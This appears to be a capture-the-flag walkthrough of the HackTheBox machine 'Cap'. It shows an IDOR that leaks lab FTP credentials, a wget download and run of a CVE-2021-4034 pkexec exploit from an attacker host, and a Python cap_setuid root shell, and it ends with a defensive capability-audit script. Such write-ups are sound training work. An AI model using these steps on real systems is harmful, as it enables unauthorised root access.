Walkthrough - Cap on HackTheBox
Gain a foothold on this machine with cleartext credentials through an IDOR, followed by privilege escalation via files with improperly configured capabilities.
Nmap
As always, let's start with port enumeration:
```
nmap -v -sV box.htb

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
```
Note: box.htb has been configured to point to the machine in /etc/hosts on Kali.
We see that the machine has FTP, SSH and a web server running. Both FTP and SSH are running current versions with no obvious known vulnerabilities, so let's turn our attention to the web server:
Web Server
I started by running dirbuster on the web server, but nothing useful turned up.
After accessing the web server, we are greeted with a security dashboard with the following pages and functionality in the navigation bar:
- Security Snapshot (5 second PCAP + Analysis)
- IP Config
- Network Status
- Search
A brief examination shows that IP Config and Network Status are purely informative, and that the Search function does not work. The Security Snapshot feature is the interesting one, since we might find some useful traffic in the packet capture.
The Security Snapshot links to a /capture endpoint, and the server redirects us to /data/1. Visiting this page again redirects us to /data/2, indicating that the final path parameter is a sequential ID that can be modified to view a different packet capture. Nothing checks whether the capture we request is our own, which is an insecure direct object reference (IDOR).
We strike gold when we navigate to /data/0, because we get access to a packet capture containing FTP credentials in cleartext:
```
nathan:Buck3tH4TF0RM3!
```
Let's login to the FTP server to see if there's anything useful:
```
ftp box.htb
Connected to box.htb.
220 (vsFTPd 3.0.3)
Name (box.htb:kali): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 Aug 23 09:55 snap
-r--------    1 1001     1001           33 Aug 23 09:35 user.txt
226 Directory send OK.
ftp> get user.txt
```
And boom, we have the user flag.
```
cat user.txt
ed7e52**************************
```
Let's see if we can log in to SSH with the same credentials to obtain a shell, and it turns out we can... That's why you shouldn't reuse passwords across services!
Privilege Escalation
Now let's try and get root access.
Method 1 - PolicyKit Exploit
LinPEAS suggests that the machine is vulnerable to CVE-2021-4034, a local privilege escalation vulnerability in polkit's pkexec, which comes pre-installed on most Linux distributions.
Start by downloading the exploit here.
We can host it on our attacking machine using a simple HTTP server.
```
python -m SimpleHTTPServer <port>
Serving HTTP on 0.0.0.0 port 1234 ...
```
Now download the exploit files onto the victim machine, compile and run the exploit!
```
wget http://<attacker-ip>:<port>/main
unzip main
cd CVE-2021-4034
make
./cve-2021-4034
```
And we have root!
```
cat /root/root.txt
99cd63**************************
```
Carry on reading if you're interested in how we can leverage a misconfigured setuid capability, the intended path on this box, to escalate our privileges:
Method 2 - SetUid Capability
The LinPEAS script enumerates files with special capabilities:
```
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```
Notice that /usr/bin/python3.8 has the cap_setuid capability set (and the "e" in +eip means it is effective), allowing any process running that interpreter to change its own user ID. Recall that root on Linux has user ID 0, so we can obtain root if we spawn a shell from Python after changing the user ID to 0. The other entries (cap_net_raw on ping and friends) are the normal defaults; granting cap_setuid to a general-purpose interpreter is the misconfiguration.
```
/usr/bin/python3.8
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:/
```
And voila!
```
cat /root/root.txt
99cd63**************************
```
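For defenders, the fix is to audit file capabilities the same way LinPEAS does and remove any identity-changing capability from general-purpose interpreters. The script below is an added example, not part of the original walkthrough or of LinPEAS: it parses getcap-style output (the sample input is constructed from the lines shown above), flags binaries whose effective set includes a dangerous capability, and prints the `setcap -r` command that strips it. The severity labels and the list of "dangerous" capabilities are my own choices.

```python
import re

# Constructed sample: the getcap-style lines LinPEAS printed on this machine.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Capabilities that let a process change identity or bypass file permissions.
# On an interpreter they are equivalent to a setuid-root binary (assumed list).
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}
INTERPRETER = re.compile(r"(python|perl|ruby|php|node|bash|dash|sh|lua)[\d.]*")

# Accepts both "path = caps+flags" (older libcap) and "path caps=flags" (newer libcap).
LINE_RE = re.compile(r"^(?P<path>\S+)(?: = |\s+)(?P<caps>[\w,]+)[+=](?P<flags>[eip]+)$")

def parse_getcap_line(line):
    """Return {'path', 'caps', 'flags'} for one getcap line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"path": m["path"], "caps": set(m["caps"].split(",")), "flags": set(m["flags"])}

def audit(text):
    """Return (severity, path, dangerous_caps) for every effective dangerous capability."""
    findings = []
    for line in text.splitlines():
        entry = parse_getcap_line(line)
        if not entry:
            continue
        bad = entry["caps"] & DANGEROUS
        if bad and "e" in entry["flags"]:  # only the effective set matters at exec time
            basename = entry["path"].rsplit("/", 1)[-1]
            severity = "critical" if INTERPRETER.fullmatch(basename) else "high"
            findings.append((severity, entry["path"], sorted(bad)))
    return findings

if __name__ == "__main__":
    for severity, path, caps in audit(SAMPLE):
        print(f"[{severity}] {path}: {','.join(caps)}  ->  remediate with: setcap -r {path}")
```

On a live host, feed it the output of `getcap -r / 2>/dev/null` instead of SAMPLE.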